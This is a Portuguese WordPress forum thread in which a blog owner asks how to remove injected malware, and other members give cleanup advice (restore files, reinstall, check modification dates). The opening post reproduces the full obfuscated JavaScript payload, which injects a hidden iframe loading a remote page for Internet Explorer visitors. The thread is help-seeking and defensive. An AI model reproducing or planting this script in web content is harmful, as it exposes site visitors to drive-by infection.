← WordPress

Problema com malware

Lida 2153 vezes

Offline

carlosm 
Membro
Mensagens 571 Gostos 10
Feedback +8

Troféus totais: 29
Trófeus: (Ver todos)
Tenth year Anniversary Nineth year Anniversary Windows User Super Combination Combination Topic Starter Poll Voter Level 5 Level 4 Level 3

Este fim de semana um dos meus blogs foi infetado com malware.

Através do  http://sitecheck.sucuri.net/scanner/  vi que o código malicioso é o seguinte:

<script>eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('i 9(){a=6.h(\'b\');7(!a){5 0=6.j(\'k\');6.g.l(0);0.n=\'b\';0.4.d=\'8\';0.4.c=\'8\';0.4.e=\'f\';0.m=\'w://z.o.B/C.D?t=E\'}}5 2=A.x.q();7(((2.3("p")!=-1&&2.3("r")==-1&&2.3("s")==-1))&&2.3("v")!=-1){5 t=u("9()",y)}',41,41,'el||ua|indexOf|style|var|document|if|1px|MakeFrameEx|element|yahoo_api|height|width|display|none|body|getElementById|function|createElement|iframe|appendChild|src|id|nl|msie|toLowerCase|opera|webtv||setTimeout|windows|http|userAgent|1000|jfhjfd|navigator|ai|showthread|php|72241732'.split('|'),0,{}))


O problema é que não consigo descobrir onde é esse código foi injetado, para o apagar.

Alguém pode ajudar?

Offline

asturmas 
Administrador
Mensagens 19734 Gostos 49
Feedback +2

Troféus totais: 39
Trófeus: (Ver todos)
Mobile User Windows User Super Combination Combination Topic Starter 100 Poll Votes 50 Poll Votes 10 Poll Votes Poll Voter Poll Starter

Já substituíste os ficheiros do wordpress e template pelos originais?
Offline

carlosm 
Membro
Mensagens 571 Gostos 10
Feedback +8

Troféus totais: 29
Trófeus: (Ver todos)
Tenth year Anniversary Nineth year Anniversary Windows User Super Combination Combination Topic Starter Poll Voter Level 5 Level 4 Level 3

Já resolvi.

A empresa de alojamento restaurou a versão do site anterior à infeção.
Offline

kurtmix 
Membro
Mensagens 1894 Gostos 601
Feedback +4

Troféus totais: 25
Trófeus: (Ver todos)
Seventh year Anniversary Search Level 5 Windows User Super Combination Combination Topic Starter Level 4 Level 3 Level 2

Já resolvi.

A empresa de alojamento restaurou a versão do site anterior à infeção.

O ideal era tentares saber por onde entrou o bicho porque pode voltar se a porta ainda estiver aberta...
Offline

Celso Azevedo 
Membro
Mensagens 3500 Gostos 38
Feedback +12

Troféus totais: 30
Trófeus: (Ver todos)
Super Combination Combination Topic Starter 10 Poll Votes Poll Voter Level 5 Level 4 Level 3 Level 2 Level 1

Se o problema não estiver no tema, apaga o wordpress e instala-o novamente.

A cerca de um mês tive que resolver um problema semelhante a esse, o código tinha sido injectado nos próprios ficheiros do wordpres... reinstalar foi a solução mais simples que encontrei.
Offline

carlosm 
Membro
Mensagens 571 Gostos 10
Feedback +8

Troféus totais: 29
Trófeus: (Ver todos)
Tenth year Anniversary Nineth year Anniversary Windows User Super Combination Combination Topic Starter Poll Voter Level 5 Level 4 Level 3

O ideal era tentares saber por onde entrou o bicho porque pode voltar se a porta ainda estiver aberta...

E como é que vejo isso?
Offline

jacktonte 
Membro
Mensagens 31 Gostos 0
Feedback +2

Troféus totais: 15
Trófeus: (Ver todos)
Super Combination Combination Topic Starter Level 3 Level 2 Level 1 10 Posts First Post Karma Sixth year Anniversary

Vê na data das modificações dos ficheiros, php.ini, .htaccess, etc.

Tens tb um site PT que analisa o código fonte das páginas. pke.nu/scan acho eu  :cool:
Offline

carlosm 
Membro
Mensagens 571 Gostos 10
Feedback +8

Troféus totais: 29
Trófeus: (Ver todos)
Tenth year Anniversary Nineth year Anniversary Windows User Super Combination Combination Topic Starter Poll Voter Level 5 Level 4 Level 3

Neste caso o empresa de alojamento disse-me que foi um ataque de malware que entrou via ftp.

Já algum tempo que não corria o programa anti-malware no meu computador de trabalho e entretanto fui infetado. Quando usei ftp para aceder ao alojamento "lixei-me".